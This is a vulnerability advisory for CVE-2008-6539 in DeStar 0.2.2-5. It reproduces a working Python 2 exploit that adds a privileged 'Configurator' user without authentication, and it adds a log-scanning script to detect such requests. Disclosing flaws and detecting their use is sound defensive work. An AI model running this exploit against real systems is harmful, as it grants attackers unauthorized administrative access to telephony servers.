Written by nonroot
Tuesday, 07 April 2009 22:53
Destar Add User Unauthorized Access Vulnerability

Bugtraq ID: 28426
Class: Access Validation Error
CVE: CVE-2008-6539
Remote: Yes
Local: No
Published: Mar 24 2008 12:00AM
Updated: Apr 07 2009 08:46PM
Credit: nonroot
Vulnerable: DeStar DeStar 0.2.2-5

Discussion
Destar is prone to an unauthorized-access vulnerability.
An unauthenticated attacker can exploit this issue to add arbitrary users to the affected application.
Destar 0.2.2-5 is vulnerable; other versions may also be affected.
Exploit(s)/PoC(s)
An attacker could exploit this issue through a browser.
The following exploit code is available (listed as 28426.pl; it is a Python 2 script):

```python
#!/usr/bin/python
#
# Exploit for destar 0.2.2-5, tested on Linux Debian
#
# Bug found and exploit coded by a non root user
#
# http://nonroot.blogspot.com
#
# January 2008
#
# This is a PoC, please use it just for learning how to exploit something
#
# use: $ python ./exploit_code.py
#
# required: urllib, urllib2, sys and re (Python 2)
#
import urllib, urllib2
import sys, re

print "Target host: i.e: http://127.0.0.1:8080/"
host = raw_input("Target host ( include http and /): ")

# info for the new user
#
user = 'mama'
password = 'mama'
source_ip = '127.0.0.9'
phone = ''
level = 'Configurator'
language = 'en'
#
# form fields expected by the add-user handler
adduser = urllib.urlencode({'name': user,
                            'secret': password,
                            'pc': source_ip,
                            'submit': "Submit",
                            'phone': phone,
                            'level': level,
                            'language': language})
# the request must be built for the add-user handler before the header is set,
# otherwise the header is lost when the Request object is replaced
req = urllib2.Request(host + "config/add/CfgOptUser")
req.add_header('X_FORWARDED_FOR', '')
r = urllib2.urlopen(req, adduser)
data = r.read()
# the form page contains "There were errors" when the user was not added
lookup = re.compile("There were errors").search
match = lookup(data)
if not match:
    print "Ok, now go and test your user at:", host
else:
    print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
    sys.exit(2)
sys.exit(0)
# milw0rm.com [2008-03-23]
```
Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us.
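With no vendor patch available, the practical step for an operator is to watch for the request the PoC sends. The following Python 3 script is an added example, not part of the advisory or the DeStar project: it scans a combined-format web access log for POST requests to the add-user handler named in the PoC. The log lines are constructed samples, and treating a 2xx reply as a probable success is an assumption.

```python
import re
from urllib.parse import urlsplit

# Combined access-log format (Apache/nginx); the sample lines are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# Handler the PoC posts to; Destar may be mounted under a prefix, so match the suffix.
ADD_USER_PATH = "/config/add/CfgOptUser"

SAMPLE_LOG = """\
203.0.113.7 - - [24/Mar/2008:11:02:13 +0000] "POST /config/add/CfgOptUser HTTP/1.1" 200 1843 "-" "Python-urllib/2.5"
198.51.100.4 - - [24/Mar/2008:11:03:01 +0000] "GET /config/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Mar/2008:11:03:40 +0000] "POST /pbx/config/add/CfgOptUser?x=1 HTTP/1.1" 200 1843 "-" "curl/7.18.0"
192.0.2.9 - - [24/Mar/2008:11:05:00 +0000] "POST /config/add/CfgOptUser HTTP/1.1" 403 210 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_adduser_posts(log_text):
    """Return (ip, ts, status, ua) for every POST to the add-user handler.

    The IP is the web server's socket peer. The PoC sends its own
    X-Forwarded-For header and a 'pc' form field, so neither can be
    trusted as the source address.
    """
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = urlsplit(rec["path"]).path.rstrip("/")
        if not path.endswith(ADD_USER_PATH):
            continue
        hits.append((rec["ip"], rec["ts"], int(rec["status"]), rec["ua"]))
    return hits

def likely_successful(hits):
    """Assumption: a 2xx reply means the user was probably created (the PoC
    itself can only tell by reading the response body)."""
    return [h for h in hits if 200 <= h[2] < 300]

if __name__ == "__main__":
    for ip, ts, status, ua in find_adduser_posts(SAMPLE_LOG):
        print(f"{ts} {ip} POST ...{ADD_USER_PATH} -> {status} ({ua})")
```

Any hit from a source that is not an administrator's workstation deserves a review of the user table in the affected Destar instance.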
Reference(s)
DeStar Homepage: http://destar.berlios.de (DeStar)